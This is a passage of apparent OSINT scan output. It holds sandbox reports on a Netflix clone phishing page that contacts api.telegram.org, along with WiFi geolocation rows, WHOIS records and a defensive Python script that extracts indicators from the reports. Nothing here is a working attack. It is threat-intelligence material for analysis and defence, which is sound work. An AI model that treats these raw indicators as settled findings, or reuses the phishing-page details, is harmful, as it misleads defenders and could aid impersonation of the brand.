u'threat_level': 0, u'type': 7, u'description': 
u'"185.199.108.153:443"\n "172.96.161.50:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"i.ibb.co"\n "mudit-sharma-02.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "urlref_httpsmudit-sharma-02.github.ioNetflix-page1-clone")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n 
"tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c2cba84b-ebb2-11ed-ab1e-080027e80c23}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd884a346d789fa2a.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd884a346d789fa2a.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c2cba84b-ebb2-11ed-ab1e-080027e80c23}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c2cba84d-ebb2-11ed-ab1e-080027e80c23}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df17b89474d30cf762.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', 
u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab16BC.tmp" has type "data"- Location: [%TEMP%\\Cab16BC.tmp]- [targetUID: 00000000-00003320]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003508]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF17B89474D30CF762.TMP" has type "data"- [targetUID: 00000000-00003508]\n "~DF1833837FA777F3D3.TMP" has type "data"- Location: [%TEMP%\\~DF1833837FA777F3D3.TMP]- [targetUID: 00000000-00003508]\n "~DFD90E4BDAC01BA053.TMP" has type "data"- Location: [%TEMP%\\~DFD90E4BDAC01BA053.TMP]- [targetUID: 00000000-00003508]\n "~DFD884A346D789FA2A.TMP" has type "data"- Location: [%TEMP%\\~DFD884A346D789FA2A.TMP]- [targetUID: 00000000-00003508]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Netflix-page1-clone_1_.htm" has type 
"HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "RecoveryStore._C2CBA84B-EBB2-11ED-AB1E-080027E80C23_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_CCB71ED4-EBB2-11ED-AB1E-080027E80C23_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C2CBA84D-EBB2-11ED-AB1E-080027E80C23_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text"- [targetUID: N/A]\n "CUDEXGN3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CUDEXGN3.txt]- [targetUID: 00000000-00003508]\n "XRDVDHDV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XRDVDHDV.txt]- [targetUID: 00000000-00003508]\n "BPBU9WUV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BPBU9WUV.txt]- [targetUID: 00000000-00003508]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003320]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "1QS25WA0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1QS25WA0.txt]- [targetUID: 00000000-00003508]\n "YNW852G6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YNW852G6.txt]- [targetUID: 00000000-00003508]\n "3FCYEBS5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3FCYEBS5.txt]- [targetUID: 00000000-00003508]\n "W80A5L5S.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W80A5L5S.txt]- [targetUID: 00000000-00003508]\n "Cab1893.tmp" has type "data"- Location: [%TEMP%\\Cab1893.tmp]- [targetUID: 00000000-00003320]\n "Cab1522.tmp" has type "data"- Location: 
[%TEMP%\\Cab1522.tmp]- [targetUID: 00000000-00003320]\n "Cab14A3.tmp" has type "data"- Location: [%TEMP%\\Cab14A3.tmp]- [targetUID: 00000000-00003320]\n "Cab1553.tmp" has type "data"- Location: [%TEMP%\\Cab1553.tmp]- [targetUID: 00000000-00003320]\n "Cab1ECF.tmp" has type "data"- Location: [%TEMP%\\Cab1ECF.tmp]- [targetUID: 00000000-00003320]\n "77EC63BDA74BD0D0E0426DC8F8008506" ha | 185.199.108.153 |
| 2023-05-12 02:45:57 | Physical Location | No | AbstractAPI | 0 | 0 | 4 | 0 | None | Ashburn, Virginia, 20149, United States, North America | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00ty.github.io | 185.199.111.153 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.135): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://funny.battleb0t.xyz/images/withat_2.jpg |
| 2023-05-12 02:52:59 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ToddNet (Net ID: 00:01:24:F2:5E:43) | 37.780462,-122.390564 |
| 2023-05-12 02:54:19 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | fluid.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Vthokies (Net ID: 00:0C:41:8A:86:76) | 39.0469, -77.4903 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:F0:AC:63:DA) | 41.8781, -87.6298 |
| 2023-05-12 02:59:52 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | fondon@fondon.org | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'VM-890240065.html', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\IMM32.DLL" at base 1c030000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 1a0f0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 1a0f0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 1a0f0000\n "msedge.exe" loaded module "KERNEL32" at base 1c130000\n "msedge.exe" loaded module "C:\\WINDOWS\\TEMP\\VXOLE64.DLL" at base 130d0000\n "msedge.exe" loaded module "KERNEL32.DLL" at base 1c130000\n "msedge.exe" loaded module "COMBASE.DLL" at base cc30000\n "msedge.exe" loaded module "OLE32.DLL" at base 1b8a0000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\UXTHEME.DLL" at base 183e0000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base c60000\n "msedge.exe" loaded module "NTDLL.DLL" at base 1da50000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base 1afc0000\n "msedge.exe" loaded module "SHELL32.DLL" at base 1c3e0000\n "msedge.exe" loaded module "USER32.DLL" at base 1b070000'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates 
mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:3108:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:3108:304:WilStaging_02"\n "Local\\SM0:3108:120:WilError_01"\n "SM0:3108:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3108:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3108:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.22.58.100:443"\n "65.8.158.45:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', 
u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\000003.log]- [targetUID: 00000000-00003108]\n "dff028b9-debb-425e-95ec-db6dcfe0c7a5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\dff028b9-debb-425e-95ec-db6dcfe0c7a5.tmp]- [targetUID: 00000000-00003108]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003108]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003108]\n "recovery-component-inner.crx" has type "Google Chrome extension version 3"- Location: [%TEMP%\\3108_988682905\\recovery-component-inner.crx]- [targetUID: 00000000-00003108]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\3108_1946692508\\_metadata\\verified_contents.json]- [targetUID: 00000000-00003108]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42\\Ruleset Data]- [targetUID: 00000000-00003108]\n 
"safety_tips.pb" has type "data"- Location: [%TEMP%\\3108_1946692508\\safety_tips.pb]- [targetUID: 00000000-00003108]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\3108_1321371211\\LICENSE]- [targetUID: 00000000-00003108]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\manifest.fingerprint]- [targetUID: 00000000-00003108]\n "Tabs_13322050400392718" has type "data"- [targetUID: 00000000-00003108]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\3108_1321371211\\Filtering Rules-AA]- [targetUID: 00000000-00003108]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003108]\n "crl-set" has type "data"- Location: [%TEMP%\\3108_2078777495\\crl-set]- [targetUID: 00000000-00003108]\n "542bbdf5-e20d-490f-b532-dad17c51b430.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\542bbdf5-e20d-490f-b532-dad17c51b430.tmp]- [targetUID: 00000000-00003108]\n "edfd1835-3b13-413e-ace3-5b2b20c35b91.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\edfd1835-3b13-413e-ace3-5b2b20c35b91.tmp]- [targetUID: 00000000-00003108]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003108]\n "53d044ee-9693-456b-888f-a32a00e16b55.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\53d044ee-9693-456b-888f-a32a00e16b55.tmp]- [targetUID: 00000000-00003108]\n "79c56db7-bc22-4724-af43-440425afe543.tmp" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\79c56db7-bc22-4724-af43-440425afe543.tmp]- 
[targetUID: 00000000-00003108]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42"\n Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.42\\LICENSE"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 185.199.111.153 on port 443"\n "HTTPS traffic to 104.22.58.100 on port 443"\n "HTTPS traffic to 65.8.158.45 on port 443"\n "HTTPS traffic to 149.154.167.220 on port 443"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\',\'HTwmL\',\'FMZIW\',\'YxdVX\',\'UUudk\',\'osUws\',\'\\x22\\x20alt\',\'Vk_o8\',\'bmlnN\',\'JcovJ\',\'MJRMC\',\'bnPFS\',\'t\\x20:\\x20\',\'ZiAVF\',\'gUJej\',\'ABXSa\',\'Count\',\'sendM\',\'UeqSP\',\'LYCIA\',\'ine_a\',\'cETfn\',\'\\x20View\',\'bMiuV\',\'bot59\',\'ZhDfd\',\'nGSWQ\',\'UZgVS\',\'yzTJX\',\'btzqT\',\'#Date\',"\n Heuristic match: "api.telegram.org"\n Heuristic match: "fondon@fondon.org"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': 
u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Gener |
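The two Hybrid Analysis cells above carry the report as a Python 2 `u''` repr of a dict whose `signatures` list holds one double-quoted item per line in each `description`. The following is an added example (not SpiderFoot or Hybrid Analysis code) that pulls the contacted sockets, queried domains and ATT&CK IDs out of that structure; `SAMPLE_REPORT` is a constructed, cut-down copy of the first report above, and the `SANDBOX_NOISE` set is an assumption based on the Windows-guest lookups visible there.

```python
"""Extract network indicators and ATT&CK technique IDs from a Hybrid Analysis
report of the shape shown in the Hybrid Analysis cells above.

Added example, not SpiderFoot or Hybrid Analysis code. SAMPLE_REPORT is a
constructed, cut-down copy of the first report (Python 2 u'' repr rewritten as
plain dict literals); signature names and the one-item-per-line description
layout are taken from the page.
"""
import re
from typing import Dict, Set

SAMPLE_REPORT = {
    "threat_score": 100,
    "classification_tags": ["phishing"],
    "submit_name": "https://mudit-sharma-02.github.io/Netflix-page1-clone/",
    "signatures": [
        {"name": "Creates mutants", "attck_id": None, "threat_level": 0,
         "description": '"Local\\\\ZonesCacheCounterMutex"\n "Local\\\\URLBLOCK_DOWNLOAD_MUTEX"'},
        {"name": "Contacts server", "attck_id": "T1071", "threat_level": 0,
         "description": '"185.199.108.153:443"\n "172.96.161.50:443"\n "52.155.62.95:443"'},
        {"name": "Queries DNS server", "attck_id": "T1071.004", "threat_level": 0,
         "description": '"i.ibb.co"\n "mudit-sharma-02.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'},
    ],
}

QUOTED = re.compile(r'"([^"]+)"')
SOCKET = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d+$")

# Sandbox background noise: the Windows guest resolves these on its own.
# Assumption for this example, based on the lookups the browser sample made.
SANDBOX_NOISE = {"query.prod.cms.msn.com", "teredo.ipv6.microsoft.com"}


def extract_iocs(report: dict) -> Dict[str, object]:
    """Return contacted sockets, queried domains and ATT&CK IDs from `report`."""
    sockets: Set[str] = set()
    domains: Set[str] = set()
    techniques: Set[str] = set()
    max_sig_level = 0
    for sig in report.get("signatures", []):
        if sig.get("attck_id"):
            techniques.add(sig["attck_id"])
        max_sig_level = max(max_sig_level, sig.get("threat_level") or 0)
        items = QUOTED.findall(sig.get("description") or "")
        name = sig.get("name", "")
        if name == "Contacts server":
            sockets.update(i for i in items if SOCKET.match(i))
        elif name == "Queries DNS server":
            domains.update(i for i in items if i not in SANDBOX_NOISE)
    return {
        "submit_name": report.get("submit_name"),
        "threat_score": report.get("threat_score"),
        "tags": list(report.get("classification_tags") or []),
        "max_signature_threat_level": max_sig_level,
        "sockets": sorted(sockets),
        "domains": sorted(domains),
        "techniques": sorted(techniques),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(SAMPLE_REPORT), indent=2))
```

The `max_signature_threat_level` field is there to surface what the rows above show: every signature is `threat_level: 0` / "informative", so a `threat_score` of 100 comes from the `phishing` classification rather than from any behavioural signature, and the extracted sockets are the GitHub Pages and image-host endpoints a clone page would contact anyway.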
| 2023-05-12 02:59:47 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 3 | 0 | None | Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2017-05-24T17:44:01Z
Creation Date: 2009-02-17T22:07:54Z
Registry Expiry Date: 2024-02-17T22:07:54Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS3.CLOUDFLARE.COM
Name Server: NS4.CLOUDFLARE.COM
Name Server: NS5.CLOUDFLARE.COM
Name Server: NS6.CLOUDFLARE.COM
Name Server: NS7.CLOUDFLARE.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2021-09-27T15:18:45Z
Creation Date: 2009-02-17T22:07:54Z
Registrar Registration Expiration Date: 2024-02-17T22:07:54Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Name Server: ns3.cloudflare.com
Name Server: ns4.cloudflare.com
